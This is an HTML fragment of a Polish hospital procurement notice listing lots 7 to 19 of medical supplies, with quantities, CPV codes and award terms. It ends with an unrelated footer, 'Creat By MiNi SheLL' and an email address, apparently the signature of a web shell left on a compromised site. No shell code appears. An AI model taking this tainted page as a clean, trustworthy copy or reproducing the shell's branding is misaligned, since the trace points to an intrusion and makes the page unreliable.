<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet Nr 7 Materiały do EKG, EEG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Elektroda j.uż. z wcięciem  - dla dorosłych Holter 	14000	szt
2	Elektroda EKG j.uż z żelem  dla dzieci	100	szt
3	Elektroda EKG j.uż. z żelem dla dorosłych	13000	szt
4	Elektroda  kończynowe dla dorosłych a 4 szt.	2	kpl
5	Elektroda przyssawkowe  20-25 mm a 6 szt.	3	kpl
6	Elektroda do czasowej stymulacji serca 5 F zagięta  	4	szt
7	Introduktor  do elektrody z poz. nr 6	4	szt
8	Papier EKG Ascard 3 z nadrukiem	150	szt
9	Papier EKG Ascard 33 z nadrukiem	160	szt
10	Papier EKG Ascard A 4 z nadrukiem	1000	szt
11	Żel  UKG / USG  0,25 l	700	szt
12	Papier do Videoprinterów K-61B	80	szt
13	Papier do videoprinterów K 65 HM 	20	szt
14	Papier do ap.KTG Sonicaid Oxford Team 7	25	szt
15	PapierTeam Meridian 800  /143x150x300/	65	szt
16	Papier HP M 1911A	40	szt
17	Pas do EKG uniwersalny	2	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet Nr 8   Szyny Kramera i Zimmera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Szyna aluminiowa 200x15	30
2	Szyna aluminiowa 200x20	15
3	Szyna aluminiowa 230x15	15
4	Szyna aluminiowa 500x20	30
5	Szyna Kramera 500x70	50
6	Szyna Kramera 600x70	30
7	Szyna Kramera 600x50	65
8	Szyna Kramera 1000x70	80
9	Szyna Kramera 1000x100	110
10	Szyna Kramera 1500x70	140
11	Szyna Kramera 1500x100	140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 - Strzykawki Janet.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Strzykawka Janet 100ml jednoraz. użytku z podwójną skalą i dołączonym łącznikiem Luer w kształcie ściętego stożka o długości ok. 3cm (do płukania uszu)	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet Nr 10   Maska oddechowa przeciwko zakażeniom drogami oddechowymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jednorazowa półmaska z filtracją cząsteczek zgodnie z normą europejską  EN 149, klasa FFP2  zapewniająca ochronę przed unoszącymi się w powietrzu cząsteczkami substancji stałych i płynnych (mikroorganizmy, krew, płyny ustrojowe i inne cząsteczki do rozmiaru 1 mikrona),  przeciwko zakażeniom drogami oddechowymi do stosowania przez pracowników ochrony zdrowia.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet Nr 11 Żel do USG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Żel do USG - do głowic wolumetrycznych, nie zawierający soli, o wysokich parametrach lepkości i wysokiej szybkości transmisji, bakteriostatyczny, poj. 5 kg, typu Eco Supergel	18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12  Zestaw do przezskórnej endoskopowej gastrostomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw do przezskórnej endoskopowej gastrostomii Ch 18/40cm, pakowany pojedyńczo w  folię , sterylny	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet Nr 13  Rurki rektoskopowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sigmoidoskopowa rurka rektoskopowa  250x20mm, jednorazowego użytku	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet Nr 14 Igły do ostrzyknięć.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Igła do ostrzyknięć jednorazowego użytku dł.narzędzia 2300mm,śr.igły 0,7mm,śr.drenu 2,3mm dł. igły 5mm	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet Nr 15 Podkłady na rolce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podkłady jedn.użytku na rolce, podfoliowane  szer. 50 cm,  dł. 40mb  z perforacją	500	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet Nr 16 Koszulki przedoperacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koszula przedoperacyjna dla pacjenta.
Wykonana z włókniny PP o masie ok.40 g/m2. Rozmiar 110 x 140 cm. W kształcie tuniki wiązanej z tyłu na 2 pary troków (jedna na wysokości szyi a druga w połowie pleców). Krótkie rękawy. Półokrągłe wycięcie pod szyją. Nieprześwitująca.
	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet Nr 17 Ostrza do strzygarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ostrza do strzygarki elektrycznej mod.9661firmy 3M	400	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet Nr 18 Pojemniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pojemnik na na odpady szpitalne 2l.	2200	szt
2	Pojemnik na na odpady szpitalne 10l.	700	szt
3	Pojemnik na na odpady szpitalne 60l.	10	szt
4	Pojemnik na odpady szpitalne 0,7l.	900	szt.
5	Pojemnik na odpady szpitalne 1,0 l	1800	szt
6	Pojemnik histopatologiczny  poj.120ml	400	szt
7	Pojemnik histopatologiczny  poj. 250ml	350	szt
8	Pojemnik histopatologiczny  poj. 500ml	250	szt
9	Pojemnik histopatologiczny  poj. 1000ml	250	szt
10	Pojemnik histopatologiczny  poj. 2000ml	55	szt
11	Pojemnik histopatologiczny  poj. 3000ml	55	szt
12	Pojemnik histopatologiczny  poj. 5600ml	60	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet Nr 19 Prześcieradło.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prześcieradło z włókniny polipropylenowej laminowanej folią  210 x 130 	500	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com